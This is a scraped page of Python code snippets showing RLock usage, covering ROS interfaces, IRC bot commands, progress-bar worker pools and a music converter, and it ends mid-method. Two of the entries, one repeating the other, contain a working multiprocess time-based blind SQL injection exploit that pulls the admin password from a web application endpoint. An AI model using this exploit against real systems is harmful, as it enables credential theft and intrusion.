Esempio n. 1
0
class ROSMulti(object):
    """ Experimental ros interface wrapping the complexities of communicating with multiple ros masters """
    """ Creates a new process, configured with the appropriate variables and uses pipes to relay data """
    """ to and from the current process.  The hope is to stablise this to the point that it can """
    """ replace direct calls to rosHelper, allowing for communication and control of multiple robots """
    """ from the same top level process. """
    def __init__(self, version=None, packagePath=None, packageName=None, rosMaster=None, overlayPath=None):
        localPipe, remotePipe = Pipe()
        self._pipe = localPipe
        self._rosRemote = _RosMulti(version, rosMaster, overlayPath, remotePipe)
        self._rosRemote.start()
        self._pipeLock = RLock()
    
    def __del__(self):
        self._pipe.close()
    
    def getSingleMessage(self, topic, retryOnFailure=1, timeout=None):
        msg = Message('getSingleMessage', {'topic':topic, 'retryOnFailure':retryOnFailure, 'timeout':timeout})
        return self._send(msg)
        
    def getTopics(self, baseFilter='', exactMatch=False):
        msg = Message('getTopics', {'baseFilter':baseFilter, 'exactMatch':exactMatch})
        return self._send(msg)

    def getMessageType(self, topic):
        msg = Message('getMessageType', {'topic':topic})
        return self._send(msg)
    
    def getParam(self, paramName):
        msg = Message('getParam', {'paramName': paramName})
        return self._send(msg)
    
    def _send(self, msg):
        self._pipeLock.acquire()
        try:
            self._pipe.send(msg)
            try:
                ret = self._pipe.recv()
            except EOFError:
                return None
            
            if type(ret) == Exception:
                raise ret
            else:
                return ret
        finally:
            self._pipeLock.release()
Esempio n. 2
0
class GuessPassword(object):
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # 这里不能写成 self.stop_flag[0] = False, 否则会提示 indexOutRange
        for _ in range(1, self.passwd_length):
            self.queue.put(_)

    def exploit(self):
        while not self.queue.empty() and not self.stop_flag[0]:
            passwd_position = self.queue.get()
            for _guess_char in range(33, 128):
                payload = self.payload.format(position=passwd_position, guess_char=_guess_char)
                exp_data = {'sid': payload}
                try:
                    res = requests.post(self.url, data=exp_data, cookies=self.cookie, timeout=self.timeout)
                except requests.ReadTimeout:
                    self.lock.acquire()
                    self.result[passwd_position] = chr(_guess_char)
                    print "Data %dth: %s" % (passwd_position, self.result[passwd_position])
                    self.lock.release()
                    break

    def run(self):

        for _ in range(self.processes):
            _worker = Process(target=self.exploit)
            # _worker.daemon = True
            _worker.start()

        try:
            while len(
                    multiprocessing.active_children()) > 2:  # 为什么不是大于0呢, 当所有工作子进程都结束之后,还有两个子进程在运行,那就是两个Manager 子进程(用于多进程共享数据);multiprocessing.active_children() 返回的是当前活动进程对象的list
                # self.lock.acquire()
                # print len(multiprocessing.active_children())
                # self.lock.release()
                time.sleep(1)
        except KeyboardInterrupt:
            self.lock.acquire()
            print 'wait for all subprocess stop......'
            self.stop_flag[0] = True
            self.lock.release()

        else:
            print self.result
            print 'finish'
Esempio n. 3
0
class ChannelMutex(object):
    def __init__(self):
        self.reader_mutex = RLock()
        self.writer_mutex = os.name != 'nt' and RLock() or None
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __getstate__(self):
        return self.reader_mutex, self.writer_mutex

    def __setstate__(self, state):
        self.reader_mutex, self.writer_mutex = state
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __enter__(self):
        self.acquire()
        return self

    def __exit__(self, *_):
        self.release()

    def _make_acquire_method(self):
        def unix_acquire():
            self.reader_mutex.acquire()
            self.writer_mutex.acquire()

        def windows_acquire():
            self.reader_mutex.acquire()

        return os.name != 'nt' and unix_acquire or windows_acquire

    def _make_release_method(self):
        def unix_release():
            self.reader_mutex.release()
            self.writer_mutex.release()

        def windows_release():
            self.reader_mutex.release()

        return os.name != 'nt' and unix_release or windows_release

    @property
    @contextmanager
    def reader(self):
        with self.reader_mutex:
            yield self

    @property
    @contextmanager
    def writer(self):
        with self.writer_mutex:
            yield self
Esempio n. 4
0
class ROS(object):
    def __init__(self, version=None, packagePath=None, packageName=None, rosMaster=None, overlayPath=None):
        localPipe, remotePipe = Pipe()
        self._pipe = localPipe
        self._rosRemote = _RosMulti(version, rosMaster, overlayPath, remotePipe)
        self._rosRemote.start()
        self._pipeLock = RLock()
    
    def __del__(self):
        self._pipe.close()
    
    def getSingleMessage(self, topic, retryOnFailure=1, timeout=None):
        msg = Message('getSingleMessage', {'topic':topic, 'retryOnFailure':retryOnFailure, 'timeout':timeout})
        return self._send(msg)
        
    def getTopics(self, baseFilter='', exactMatch=False):
        msg = Message('getTopics', {'baseFilter':baseFilter, 'exactMatch':exactMatch})
        return self._send(msg)

    def getMessageType(self, topic):
        msg = Message('getMessageType', {'topic':topic})
        return self._send(msg)
    
    def _send(self, msg):
        self._pipeLock.acquire()
        try:
            self._pipe.send(msg)
            try:
                ret = self._pipe.recv()
            except EOFError:
                return None
            
            if type(ret) == Exception:
                raise ret
            else:
                return ret
        finally:
            self._pipeLock.release()
Esempio n. 5
0
 def __init__(self, bot):
     super(AddMember, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'add_member',
             'dodaj clana',
         ], r'(\S+) +(.+)'),
         name='add_member',
         doc='Add member to the army',
         example='.add_member zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Esempio n. 6
0
def run_jobs(arguments: List, func: Callable, num_processes=5) -> List:
    """
    Run a function with n-process. The list of arguments correspond to arguments to the function, these are splitted in
    n-process chunks.
    """
    arguments = chunker_list(arguments, num_processes)
    with Pool(processes=num_processes,
              initargs=(RLock(), ),
              initializer=tqdm.set_lock) as pool:
        jobs = [
            pool.apply_async(run, args=(pid, func, arg))
            for pid, arg in enumerate(arguments)
        ]
        result_list = [job.get() for job in jobs]
    return sum(result_list, [])
Esempio n. 7
0
    def __init__(self, file='control.log',
                 stream=sys.stdout,
                 level=logging.INFO):
        self.logger = logging.getLogger('ExperimentControl')

        stream_hdlr = logging.StreamHandler(stream=stream)
        file_hdlr = logging.FileHandler(file)
        stream_hdlr.setFormatter(self.STREAM_LOG_FMT)
        file_hdlr.setFormatter(self.FILE_LOG_FMT)

        self.logger.addHandler(stream_hdlr)
        self.logger.addHandler(file_hdlr)
        self.logger.setLevel(level)

        self.lock = RLock()
Esempio n. 8
0
 def __init__(self, task):
     self._task = task
     # notice the double link, this important since the Artifact
     # dictionary needs to signal the Artifacts base on changes
     self._artifacts_container = self._ProxyDictWrite(self)
     self._last_artifacts_upload = {}
     self._unregister_request = set()
     self._thread = None
     self._flush_event = Event()
     self._exit_flag = False
     self._summary = ''
     self._temp_folder = []
     self._task_artifact_list = []
     self._task_edit_lock = RLock()
     self._storage_prefix = None
Esempio n. 9
0
def scp_operation(args):
    credentials = Credentials()
    targets = args.hostname.split(",")
    tqdm.set_lock(RLock())
    with Pool(initializer=tqdm.set_lock, initargs=(tqdm.get_lock(), )) as pool:
        pool.starmap(
            scp_process,
            zip(
                targets,
                repeat(credentials),
                repeat(args.filename),
                repeat(args.dst_file_path),
                list(range(len(targets))),
            ),
        )
Esempio n. 10
0
    def __init__(self):
        
        self.df_to_tp = dict()

        self.attached_dataframes = set()
        
        self.all_types_dataframes = set()

        self.tp_to_attached_df = dict()

        self.queues = dict()
        
        self.type_map = dict()
        
        self.add_lock = RLock()
Esempio n. 11
0
 def __init__(self, bot):
     super(RemoveGeneral, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'remove_general',
             'izbaci generala',
         ], r'(\S+) +(\S+)'),
         name='remove_general',
         doc='Remove general of the army (by IRC name)',
         example='.remove_general zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Esempio n. 12
0
    def __init__(self, *args, **kwargs):
        self._args = args
        self._kwargs = kwargs
        self._connection = None
        self._closed = False
        self._close_callback = None
        self._io_loop = kwargs.pop('io_loop', None)

        self.__cursor_lock = RLock()

        if self._io_loop is None:
            self._io_loop = IOLoop.current()

        if "cursorclass" in kwargs and issubclass(kwargs["cursorclass"], Cursor):
            kwargs["cursorclass"] = kwargs["cursorclass"].__delegate_class__
Esempio n. 13
0
def create_reservation(product_id, customer_id):
    locks = current_app.locks['products']

    if product_id not in locks:
        locks[product_id] = RLock()

    with locks[product_id]:
        cache = current_app.cache
        reservation = Reservation(product_id=product_id,
                                  customer_id=customer_id)
        reservations = Reservation.all()
        reservations[reservation.id] = reservation
        current_app.cache.set('reservations', reservations)

    return reservation
Esempio n. 14
0
 def __init__(self, bot):
     super(SetOrder, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'set_order',
             'postavi naredjenje',
         ], r'(\S+) +(.+)'),
         name='set_order',
         doc='Set the order for the army',
         example='.set_order zdrug Shoot for eSerbia in ...',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Esempio n. 15
0
 def __init__(self, bot):
     super(RemoveMember, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'remove_member',
             'izbaci clana',
         ], r'(\S+) +(.+)'),
         name='remove_member',
         doc='Remove member from the army',
         example='.remove_member zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Esempio n. 16
0
 def __init__(self, bot):
     super(UnbindChannel, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'unbind_channel',
             'odvezi kanal',
         ], r'(\S+) +(\S+)'),
         name='unbind_channel',
         doc='Unbind the channel from the the army',
         example='.unbind_channel zdrug #zdrug',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Esempio n. 17
0
def Array(typecode_or_type, size_or_initializer, **kwds):
    '''
    Return a synchronization wrapper for a RawArray
    '''
    lock = kwds.pop('lock', None)
    if kwds:
        raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
    obj = RawArray(typecode_or_type, size_or_initializer)
    if lock is False:
        return obj
    if lock in (True, None):
        lock = RLock()
    if not hasattr(lock, 'acquire'):
        raise AttributeError("'%r' has no method 'acquire'" % lock)
    return synchronized(obj, lock)
Esempio n. 18
0
def click_stream():
    global FILE_JSON_SIZE, BLOCK_SIZE, WORKERS, FILE_JSON_NAME
    get_file_size(FILE_JSON_NAME)  #获得文件大小
    BLOCK_SIZE = FILE_JSON_SIZE / WORKERS  #文件大小除以24,获得,每个 BLOCK_SIZE 的大小
    read_lock = RLock()  # from multiprocessing import Process, Array, RLock
    array = Array('l', WORKERS)  #猜测,这里是要分为23个进程
    process = []
    for i in range(WORKERS):
        p = Process(target=process_found,
                    args=[i, array, read_lock])  #lock:不使用锁时,不同进程的输出会混到一起
        process.append(p)  #把文件分23个txt
    for i in range(WORKERS):
        process[i].start()
    for i in range(WORKERS):
        process[i].join()
Esempio n. 19
0
 def __init__(self, bot):
     super(AddGeneral, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'add_general',
             'dodaj generala',
         ], r'(\S+) +(\S+)'),
         name='add_general',
         doc='Add general of the army (by IRC name)',
         example='.add_general zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
    def __init__(self, topic):
        self._error_deltas = []
        self._last_error = None
        self._last_error_stamp = None
        self._error_lock = RLock()

        self.pub_gripper_command = rospy.Publisher(f'{topic}/command',
                                                   Pr2GripperCommandMsg,
                                                   queue_size=1,
                                                   tcp_nodelay=True)
        self.sub_gripper_state = rospy.Subscriber(
            f'{topic}/state',
            JointControllerStateMsg,
            callback=self._cb_gripper_feedback,
            queue_size=1)
Esempio n. 21
0
def main():
    from_zoom = 9
    to_zoom = 14
    num_processes = to_zoom - from_zoom + 1

    pool = Pool(processes=num_processes,
                initargs=(RLock(), ),
                initializer=tqdm.set_lock)
    jobs = [
        pool.apply_async(exportTiles, args=(z, z - from_zoom))
        for z in range(from_zoom, to_zoom + 1)
    ]
    pool.close()
    result_list = [job.get() for job in jobs]
    print("\n" * (num_processes * 2))
Esempio n. 22
0
 def __init__(self, bot):
     super(Order, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         commands=[
             'order',
             'naredjenje',
         ],
         name='order',
         doc='Get the order for the army',
         example='.order',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Esempio n. 23
0
def debug():
    db = storage.init_database('mongo', 'wikilytics', 'enwiki_charts')
    #db.add_son_manipulator(Transform())

    lock = RLock()
    v = Variable('test', 'year', lock, {})

    for x in xrange(100000):
        year = random.randrange(2005, 2010)
        month = random.randrange(1, 12)
        day = random.randrange(1, 28)
        d = datetime.datetime(year, month, day)
        x = random.randrange(1, 10000)
        v.add(d, x, {'username': '******'})
    gc.collect()
Esempio n. 24
0
    def __init__(self, km, 
                       robot_command_processor, 
                       gripper_wrapper,
                       robot_prefix,
                       eef_path, ext_paths, 
                       controlled_symbols, cam_path=None,
                       weights=None, resting_pose=None,
                       navigation_method='linear', visualizer=None):
        self.km = km
        self.robot_command_processor = robot_command_processor
        self.robot_prefix = robot_prefix
        self.gripper_wrapper = gripper_wrapper
        self.eef_path = eef_path
        self.cam_path = cam_path

        self.visualizer    = visualizer
        self.weights       = weights
        self.controlled_symbols = controlled_symbols
        self.navigation_method  = navigation_method

        self.controller = None

        self._phase = 'homing'

        self._state_lock = RLock()
        self._state = {}
        self._target_map = {}
        self._target_body_map  = {}
        self._last_controller_update = None

        self._current_target = None
        self._last_external_cmd_msg = None
        self._robot_state_update_count = 0

        self._idle_controller = IdleController(km, 
                                               self.controlled_symbols,
                                               resting_pose,
                                               cam_path)

        self._build_ext_symbol_map(km, ext_paths)

        self.pub_external_command = rospy.Publisher('~external_command', ValueMapMsg, queue_size=1, tcp_nodelay=True)
        self.sub_external_js = rospy.Subscriber('~external_js',  ValueMapMsg, callback=self.cb_external_js, queue_size=1)
        self.robot_command_processor.register_state_cb(self.cb_robot_js)

        self._kys = False
        self._behavior_thread = threading.Thread(target=self.behavior_update)
        self._behavior_thread.start()
Esempio n. 25
0
def Value(typecode_or_type, *args, **kwds):
    """
    Return a synchronization wrapper for a Value
    """
    lock = kwds.pop('lock', None)
    if kwds:
        raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
    obj = RawValue(typecode_or_type, *args)
    if lock is False:
        return obj
    else:
        if lock in (True, None):
            lock = RLock()
        if not hasattr(lock, 'acquire'):
            raise AttributeError("'%r' has no method 'acquire'" % lock)
        return synchronized(obj, lock)
Esempio n. 26
0
 def __init__(self, bot):
     super(ListMembers, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         commands=[
             'list_members',
             'ls',
             'izlistaj clanove',
         ],
         name='list_members',
         doc='List members of the army',
         example='.list_members',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Esempio n. 27
0
 def __init__(self, interval=1, collect_load=False, use_thread=False):
     self._event_start_collect_metrics = Event()
     self._event_stop = Event()
     self._tflops = Value('d', 0.0)
     self._cpu_tflops = Value('d', 0.0)
     self._gpu_tflops = Value('d', 0.0)
     self._pid = Value('i', 0)
     self._tflops_lock = RLock()
     self.interval = interval
     self._process = None
     self._start_timestamp = None
     self._end_timestamp = None
     self._collect_load = collect_load
     self._use_thread = use_thread
     self._cpu_loads = []
     self._gpu_loads = []
Esempio n. 28
0
    def __init__(self, connection_specification, hypothesis_id, chunk_size=6500, n_processes=4,
                 glycan_combination_count=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        self.n_processes = n_processes
        self.connection_specification = connection_specification
        self.chunk_size = chunk_size
        self.hypothesis_id = hypothesis_id
        self.glycan_combination_count = glycan_combination_count
        self.current_glycan_offset = 0
        self.glycan_limit = glycan_limit

        self.input_queue = Queue(10)
        self.output_queue = Queue(1000)
        self.workers = []
        self.dealt_done_event = Event()
        self.ipc_controller = self.ipc_logger()
        self.database_mutex = RLock()
Esempio n. 29
0
def main():
    global FILE_SIZE, BLOCK_SIZE, WORKERS, FILE_NAME
    getFilesize(FILE_NAME)
    BLOCK_SIZE = FILE_SIZE / WORKERS
    print FILE_SIZE, BLOCK_SIZE
    rlock = RLock()
    array = Array('l', WORKERS)
    array[0] = 0
    process = []
    for i in range(WORKERS):
        p = Process(target=process_found, args=[i, array, rlock])
        process.append(p)
    for i in range(WORKERS):
        process[i].start()
    for i in range(WORKERS):
        process[i].join()
Esempio n. 30
0
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # 这里不能写成 self.stop_flag[0] = False, 否则会提示 indexOutRange
        for _ in range(1, self.passwd_length):
            self.queue.put(_)
Esempio n. 31
0
def run_tests_from_generator(generator, nb_of_cores=3):
    tests = generator
    if nb_of_cores > 1:
        if len(tests) == 0:
            print("already calculated")
            return
        print("running with {} cores".format(nb_of_cores))
        with Pool(nb_of_cores, initializer=tqdm.set_lock,
                  initargs=(RLock(), )) as pool:
            results = pool.imap(run_test, tests)
            for _ in tqdm(results, total=len(tests)):
                pass
    else:
        print("running sequentially on single core")
        for test in tqdm(tests):
            run_test(test)
Esempio n. 32
0
class Singleton(type):
    _instances = {}
    _singleton_lock = RLock()

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            with cls._singleton_lock:
                if cls not in cls._instances:
                    cls._instances[cls] = super(Singleton,
                                                cls).__call__(*args, **kwargs)
        return cls._instances[cls]

    def clear(cls):
        try:
            del Singleton._instances[cls]
        except KeyError:
            pass
Esempio n. 33
0
def update_product(product_id, **data):
    if product_id not in current_app.locks['products']:
        current_app.locks['products'][product_id] = RLock()

    with current_app.locks['products'][product_id]:
        product = Product.get(id=product_id)
        data = _get_validated_product_data(**data)

        for k, v in data.items():
            if k in product.as_dict():
                product.__dict__[k] = v

        products = current_app.cache.get('products')
        products[product_id] = product
        current_app.cache.set('products', products)

    return product
Esempio n. 34
0
 def to_csv(self, filename):
     data = data_converter.convert_dataset_to_lists(self, 'manage')
     headers = data_converter.add_headers(self)
     lock = RLock()
     fh = file_utils.create_txt_filehandle(settings.dataset_location,
                                           filename, 'w', 'utf-8')
     file_utils.write_list_to_csv(headers,
                                  fh,
                                  recursive=False,
                                  newline=True)
     file_utils.write_list_to_csv(data,
                                  fh,
                                  recursive=False,
                                  newline=True,
                                  format=self.format,
                                  lock=lock)
     fh.close()
Esempio n. 35
0
 def __init__(self, tg_client: TelegramClient, character: Character):
     super().__init__()
     self._tgClient = tg_client
     self._character = character
     self._send_queue = []
     self._lock = RLock()
     self._dialogs = self._tgClient.get_dialogs(100)
     self._cwBot = self._find_contact_by_username(config.CWBot)
     if not self._cwBot:
         self._cwBot = self._tgClient.invoke(SearchRequest(config.CWBot,
                                                           1)).users[0]
         self._tgClient.send_message(self._cwBot, '/start')
         self._tgClient.send_message(self._cwBot, '🇬🇵Черный замок🇬🇵')
     self._captchaBot = self._find_contact_by_username(config.CaptchaBot)
     if not self._captchaBot:
         self._captchaBot = self._tgClient.invoke(
             SearchRequest(config.CaptchaBot, 1)).users[0]
         self._tgClient.send_message(self._captchaBot, '/start')
     self._tradeBot = self._find_contact_by_username(config.TradeBot)
     if not self._tradeBot:
         self._tradeBot = self._tgClient.invoke(
             SearchRequest(config.TradeBot, 1)).users[0]
         self._tgClient.send_message(self._tradeBot, '/start')
     self._orderBot = self._find_contact_by_username(
         self._character.config.orderBot)
     if not self._orderBot:
         self._orderBot = self._tgClient.invoke(
             SearchRequest(self._character.config.orderBot, 1)).users[0]
         self._tgClient.send_message(self._orderBot, '/start')
     self._dataBot = self._find_contact_by_username(
         self._character.config.dataBot)
     if not self._dataBot:
         self._dataBot = self._tgClient.invoke(
             SearchRequest(self._character.config.dataBot, 1)).users[0]
         self._tgClient.send_message(self._dataBot, '/start')
     self._admin = self._find_contact_by_username(
         self._character.config.admin)
     if not self._admin:
         self._admin = self._tgClient.invoke(SearchRequest(self._character.config.admin, 1)).users[0] if \
             len(self._tgClient.invoke(SearchRequest(self._character.config.admin, 1)).users) else None
     self._orderGroup = self._find_contact_by_name(
         self._character.config.orderChat)
     if not self._admin:
         # Если юзера-админа не нашли, то админим сами
         self._admin = self._tgClient.session.user
     self._tgClient.add_update_handler(self._locked_receive)
Esempio n. 36
0
    def __init__(self,
                 agents: Sequence[Agent],
                 environments: Sequence[Env],
                 shared_observers: Optional[Sequence[callable]] = None,
                 max_timesteps: int = math.inf,
                 max_episodes: int = math.inf,
                 max_seconds: float = math.inf,
                 render_ids=None):

        super(AsynchronousParallelRunner, self).__init__()

        self._running = Value("b", False)

        self._num_processes = len(agents)
        self._agents = agents
        self._environments = environments

        self._max_timesteps = max_timesteps
        self._max_episodes = max_episodes
        self._max_seconds = max_seconds

        self._total_steps = Value("i", 0)
        self._total_episodes = Value("i", 0)

        self._start_time = Value("f", 0)

        def increment(counter, value):
            counter.value += value

        steps_counter = lambda timestep: increment(self._total_steps, 1)
        episodes_counter = lambda timestep: increment(self._total_episodes,
                                                      timestep.is_terminal)

        render_ids = render_ids or []
        render_lock = RLock() if len(render_ids) > 1 else None

        shared_observers = shared_observers or []

        self._runners = [
            Runner(agent=agents[i],
                   environment=environments[i],
                   observers=shared_observers +
                   [steps_counter, episodes_counter],
                   render=i in render_ids,
                   render_lock=render_lock) for i in range(self._num_processes)
        ]
Esempio n. 37
0
 def __init__(self, email, password, update_interval, baseurl=""):
     self.__connection = Connection(email, password, baseurl)
     self.__vehicles = []
     self.update_interval = update_interval
     self.__car = {}
     self.__last_update_time = 0
     self.__lock = RLock()
     self.update()
     for car_id, car in self.__car.items():
         self.__vehicles.append(Fuel(car, self))
         self.__vehicles.append(GPS(car, self))
         self.__vehicles.append(Odometer(car, self))
         self.__vehicles.append(SystemsAreOkSensor(car, self))
         self.__vehicles.append(OilLevelIsOkSensor(car, self))
         self.__vehicles.append(TirePressureIsOkSensor(car, self))
         self.__vehicles.append(BatteryChargeIsOkSensor(car, self))
         self.__vehicles.append(LockSensor(car, self))
Esempio n. 38
0
class SafeWatchedFileHandler(WatchedFileHandler):
    def __init__(self, filename, mode="a", encoding=None, delay=0):
        WatchedFileHandler.__init__(self, filename, mode, encoding, delay)
        self._lock = RLock()

    def close(self):
        self._lock.acquire(timeout=2)
        try:
            WatchedFileHandler.close(self)

        finally:
            self._lock.release()

    def emit(self, record):
        self._lock.acquire(timeout=2)
        try:
            WatchedFileHandler.emit(self, record)

        finally:
            self._lock.release()
    def __init__(self, verbose, recursive, threads, includePattern, excludePattern, overwrite, overwriteIfSrcNewer, metadataonly, src, dst, converterType='FFMpeg', srcParams='', dstParams='', srcExt='flac', dstExt='mp3'):
        '''
        Constructor
        '''
        ':type recursive: boolean'
        ':type includePattern: String'
        ':type excludePattern: String'
        ':type threads: int'
        ':type src: String'
        ':type src: String'
        ':type dstExt: String'
        ':type dstExt: String'
        ':type overwrite: String'
        ':type overwriteIfSrcNewer: String'
        self.__verbose = verbose
        self.__recursive = recursive
        self.__includePattern = includePattern
        self.__excludePattern = excludePattern
        self.__threads = threads
#         print ("src="+src)
#         print ("dst="+dst)
        self.__src = Path(src)
        self.__dst = Path(dst)
        self.__srcExt = srcExt
        self.__dstExt = dstExt
        self.__coverExtList = ['jpg', 'jpeg', 'bmp', 'png', 'gif']
        #self.__executer = ProcessPoolExecutor(max_workers=threads)
        self.__executer = ThreadPoolExecutor(max_workers=threads)
        self.__futures = []
        self.__futureEvents = {}
        self.__instance = self
        self.__mutex = RLock()
        self.__evInterrupted = Event()
        self.__overwrite = overwrite
        self.__overwriteIfSrcNewer = overwriteIfSrcNewer
        self.__metadataonly = metadataonly
        self.__converter = MusicLibraryConverterBackendFactory(converterType, srcParams, dstParams)
        if self.__converter == None or not self.__converter.backendFound():
            raise ConverterBackendNotFoundException(converterType)
Esempio n. 40
0
 def __init__(self, port=1, baudrate=115200, log=False):
     self.__keywords = []
     self.monitor_string = None
     self.__port = port
     self.__serial = serial.serial_for_url(
         "COM{num}".format(num=self.__port),
         baudrate,
         parity="N",
         rtscts=False,
         xonxoff=False,
         timeout=1,
         do_not_open=True,
     )
     self.__serial.open()
     self.__serial_io = io.TextIOWrapper(io.BufferedRWPair(self.__serial, self.__serial))
     self.__cmd_queue = Queue()
     self.__rx_thread = threading.Thread(target=self.__read_thread, name="rx_thread")
     self.__rx_thread.setDaemon(True)
     self.__rx_thread.start()
     self.__tx_thread = threading.Thread(target=self.__write_thread, name="tx_thread")
     self.__tx_thread.setDaemon(True)
     self.__tx_thread.start()
     self.__mutex = RLock()
     self.__log = log
     self.__is_monitor_rx_enable = False
     self.__echo_method = None
     if log is True:
         ltime = time.localtime(time.time())
         logging.basicConfig(
             filename="log_{mon}_{date}_{h}_{m}_{s}.txt".format(
                 mon=str(ltime.tm_mon).zfill(2),
                 date=str(ltime.tm_mday).zfill(2),
                 h=str(ltime.tm_hour).zfill(2),
                 m=str(ltime.tm_min).zfill(2),
                 s=str(ltime.tm_sec).zfill(2),
             ),
             level=logging.DEBUG,
         )
Esempio n. 41
0
class UsbCon():
    """
    USBTMC BACKEND
    A wrapper of the usbtmc library.  The idea is that I can create an
        abstraction layer so that in the future, I can write other backends
        to support other os's.  May need to make a pyvisa backend, for example.
    """
    def __init__(self, idProduct=None, idVendor=None):
        """
        """
        self.lock = RLock()
        self.instr = self.connect(idProduct, idVendor)
        print("Asking *IDN? returns: {}".format(self.ask("*IDN?")))

    def connect(self, idProduct=None, idVendor=None):
        """
        if either idProduct or idVendor are None, query the user for what to connect to.
        """
        if idProduct is None or idVendor is None:
            for dev in usbtmc.list_devices():
                print("1: {} - {}".format(dev.manufacturer, dev.product))
            dev_con = raw_input("Enter the number of the device you want to connect to: ")
            dev_chosen = usbtmc.list_devices()[int(dev_con) - 1]
            product_id = dev_chosen.idProduct
            vendor_id = dev_chosen.idVendor
        for dev in usbtmc.list_devices():
            if dev.idProduct == product_id and dev.idVendor == vendor_id:
                if dev.is_kernel_driver_active(0):
                    dev.detach_kernel_driver(0)
        instr = usbtmc.Instrument(vendor_id, product_id)
        return instr

    def read(self, num=-1, encoding="utf-8"):
        """
        Wrapping around the read method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.read(num, encoding)
        self.lock.release()
        return msg

    def write(self, message, encoding="utf-8"):
        """
        Wrapping around the write method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.write(message, encoding)
        self.lock.release()
        return msg

    def ask(self, message, num=-1, encoding="utf-8"):
        """
        Wrapping around the ask method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.ask(message, num, encoding)
        self.lock.release()
        return msg

    def read_raw(self, num=-1):
        """
        Wrapping around the read_raw method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.read_raw(num)
        self.lock.release()
        return msg

    def ask_raw(self, msg, num=-1):
        """
        Wrapping around the ask_raw method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.ask_raw(msg, num)
        self.lock.release()
        return msg
Esempio n. 42
0
 def __init__(self):
     self.reader_mutex = RLock()
     self.writer_mutex = os.name != 'nt' and RLock() or None
     self.acquire = self._make_acquire_method()
     self.release = self._make_release_method()
class MusicLibraryConverterMaster(object):
    '''
    classdocs
    '''
    __instance = None

    def __init__(self, verbose, recursive, threads, includePattern, excludePattern, overwrite, overwriteIfSrcNewer, metadataonly, src, dst, converterType='FFMpeg', srcParams='', dstParams='', srcExt='flac', dstExt='mp3'):
        '''
        Constructor
        '''
        ':type recursive: boolean'
        ':type includePattern: String'
        ':type excludePattern: String'
        ':type threads: int'
        ':type src: String'
        ':type src: String'
        ':type dstExt: String'
        ':type dstExt: String'
        ':type overwrite: String'
        ':type overwriteIfSrcNewer: String'
        self.__verbose = verbose
        self.__recursive = recursive
        self.__includePattern = includePattern
        self.__excludePattern = excludePattern
        self.__threads = threads
#         print ("src="+src)
#         print ("dst="+dst)
        self.__src = Path(src)
        self.__dst = Path(dst)
        self.__srcExt = srcExt
        self.__dstExt = dstExt
        self.__coverExtList = ['jpg', 'jpeg', 'bmp', 'png', 'gif']
        #self.__executer = ProcessPoolExecutor(max_workers=threads)
        self.__executer = ThreadPoolExecutor(max_workers=threads)
        self.__futures = []
        self.__futureEvents = {}
        self.__instance = self
        self.__mutex = RLock()
        self.__evInterrupted = Event()
        self.__overwrite = overwrite
        self.__overwriteIfSrcNewer = overwriteIfSrcNewer
        self.__metadataonly = metadataonly
        self.__converter = MusicLibraryConverterBackendFactory(converterType, srcParams, dstParams)
        if self.__converter == None or not self.__converter.backendFound():
            raise ConverterBackendNotFoundException(converterType)
        
    def handleFiles(self, srcFile, dst):
        ':type src: Path'
        ':type dst: Path'
        if not srcFile.exists():
            raise FileNotFoundError(srcFile)
        dstFile = self.deriveDstFile(srcFile, dst)
        ': :type dstFile: Path'
        skipFile = False
        if dstFile.exists():
            if dstFile.is_symlink() or not os.access(dstFile.as_posix(), os.W_OK):
                skipFile = True # Skip all symlinks and destination files which are not writable
            elif self.__overwrite:
                skipFile = False # Overwrite file as requested!
            elif self.__overwriteIfSrcNewer:
